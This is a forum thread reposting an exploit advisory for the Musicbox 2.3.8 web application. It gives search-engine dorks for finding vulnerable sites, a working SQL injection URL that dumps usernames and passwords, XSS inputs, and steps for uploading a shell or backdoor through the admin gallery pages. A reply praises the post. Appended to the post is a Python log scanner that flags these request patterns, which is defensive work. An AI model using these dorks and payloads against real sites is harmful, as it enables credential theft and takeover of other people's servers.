Musicbox 2.3.8 SQL, XSS, Shell Vulnerabilities
#1
Code:
#Exploit Title      : Musicbox 2.3.8 Multiple Vulnerabilities
#Author         : DevilScreaM
#Date           : 25/08/2013
#Category       : Web Applications
#Vendor                 : http://www.musicboxv2.com/
#Version        : 1.0 - 2.3.8

#Dork      
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability      : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On      : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz                 : Newbie-Security.or.id
  

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go to the Search feature

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Details input your XSS or text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability

*Artist Gallery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Gallery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/album_gallery/Your_Backdoor.php

Source =>
Code:
http://www.exploit-db.com/exploits/27876/
www.deccal.org
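
A defender-side check for the request patterns this advisory describes, as an added example that is not part of the original post or of Musicbox: it flags non-numeric `id` values on `genre_albums.php`, markup in the search `term`, and script files requested from the two gallery directories. The request lines are constructed, and the function names and finding labels are made up for the example; the My News fields are form input and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets as they would appear in an access log
# (not from a real server). Paths and parameter names come from the advisory.
SAMPLE_REQUESTS = [
    "/genre_albums.php?id=7",
    "/genre_albums.php?id=-3+UNION+SELECT+1,2",
    "/index.php?in=song&term=rock&action=search&start=0",
    "/index.php?in=song&term=%3Ch1%3Etest%3C%2Fh1%3E&action=search&start=0",
    "/artist_gallery/band.jpg",
    "/album_gallery/cover.php",
]

SCRIPT_IN_GALLERY = re.compile(
    r"/(?:artist|album)_gallery/[^/]+\.(?:php\d?|phtml|phar)$", re.IGNORECASE)
MARKUP = re.compile(r"<[a-zA-Z/!]")

def classify(target):
    """Return the list of findings for one request target."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # decodes %xx and '+'
    path = parts.path.lower()
    findings = []
    # genre_albums.php?id= should only ever carry a plain integer.
    if path.endswith("/genre_albums.php"):
        if any(not re.fullmatch(r"[0-9]+", v) for v in query.get("id", [])):
            findings.append("sqli:genre_albums.id")
    # The search term is reflected into the page; markup in it is suspect.
    if path.endswith("/index.php") and "search" in query.get("action", []):
        if any(MARKUP.search(v) for v in query.get("term", [])):
            findings.append("xss:search.term")
    # Image galleries should never serve a server-side script.
    if SCRIPT_IN_GALLERY.search(path):
        findings.append("upload:script-in-gallery")
    return findings

def scan(targets):
    """Map each flagged request target to its findings."""
    return {t: f for t in targets if (f := classify(t))}

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, target)
```

A hit on the gallery rule means a script already sits in an upload directory, so it warrants checking the directory contents and the admin login history rather than only blocking the request.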


#2
Nice work
People don't change; the only things that change are circumstances and interests...